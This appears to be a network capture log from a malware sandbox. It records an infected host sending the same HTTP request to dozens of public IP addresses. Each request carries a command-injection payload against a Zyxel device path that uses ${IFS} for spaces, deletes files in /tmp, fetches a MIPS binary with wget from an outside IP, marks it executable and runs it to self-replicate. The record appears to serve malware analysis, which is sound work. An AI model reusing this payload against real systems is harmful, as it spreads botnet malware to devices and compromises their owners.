                                            Feb 2, 2024 06:21:03.458122969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2066192.168.2.1535966196.202.220.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458144903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2067192.168.2.155894079.249.83.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458180904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2068192.168.2.1550218191.29.67.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458236933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2069192.168.2.1537234100.236.195.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458260059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2070192.168.2.153903853.81.182.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458300114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2071192.168.2.154073689.219.0.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458353043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2072192.168.2.1559332194.205.135.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458393097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2073192.168.2.154895823.95.154.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458416939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2074192.168.2.15527084.34.68.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458460093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2075192.168.2.1538564143.77.105.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458499908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2076192.168.2.155114643.172.230.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458544970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2077192.168.2.1553772106.245.67.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458579063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2078192.168.2.155907685.194.186.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458602905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2079192.168.2.1536634117.111.187.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458628893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2080192.168.2.155222079.113.249.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458688974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2081192.168.2.155887852.60.117.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458739996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2082192.168.2.1536566124.231.53.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458764076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2083192.168.2.1556232195.175.82.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458789110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2084192.168.2.1546870182.44.35.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458823919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2085192.168.2.1535310107.159.132.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458877087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2086192.168.2.1550800173.175.207.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458897114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2087192.168.2.1554726152.39.236.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458955050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2088192.168.2.1559312194.90.144.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458985090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2089192.168.2.153680220.165.182.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459024906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2090192.168.2.1539860193.209.174.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459049940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2091192.168.2.154417843.133.230.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459078074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2092192.168.2.154462267.91.153.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459110022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2093192.168.2.1538114143.87.191.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459166050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2094192.168.2.1557836101.174.180.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459207058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2095192.168.2.153656072.218.28.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459227085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2096192.168.2.15355602.19.57.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459265947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2097192.168.2.155241251.102.195.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459306002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2098192.168.2.1560332154.193.252.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459331036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2099192.168.2.1556666105.126.161.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459388018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2100192.168.2.153743813.248.130.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459436893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2101192.168.2.153926899.170.253.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459462881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2102192.168.2.155302053.241.17.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459482908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2103192.168.2.155438466.188.116.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459541082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2104192.168.2.1546186175.104.85.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459568024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2105192.168.2.156014659.218.135.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459604979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2106192.168.2.1541450138.241.59.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459651947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2107192.168.2.15497949.249.31.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459692955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2108192.168.2.155893835.70.207.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459731102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2109192.168.2.1557150110.61.144.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459767103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2110192.168.2.155559636.245.122.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459810019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2111192.168.2.1560870178.219.140.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459857941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2112192.168.2.1550864180.219.93.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459881067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2113192.168.2.15333068.65.51.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459929943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2114192.168.2.1555562205.113.30.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.459965944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2115192.168.2.155247825.17.74.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460011959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2116192.168.2.1554092169.209.148.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460035086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2117192.168.2.154695218.81.86.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460082054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2118192.168.2.1535890107.120.202.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460119009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2119192.168.2.155744831.204.11.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460175037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2120192.168.2.155476087.235.16.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460206985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2121192.168.2.155089235.10.211.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460264921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2122192.168.2.153829288.80.50.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460289001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2123192.168.2.154163661.154.221.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460328102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2124192.168.2.1543630204.14.138.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460370064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2125192.168.2.153496870.147.131.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460423946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2126192.168.2.1553652216.210.81.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460453987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2127192.168.2.1544334147.183.126.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460486889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2128192.168.2.155592458.234.159.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460525036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2129192.168.2.154329048.240.96.152443
                                            TimestampBytes transferredDirectionData
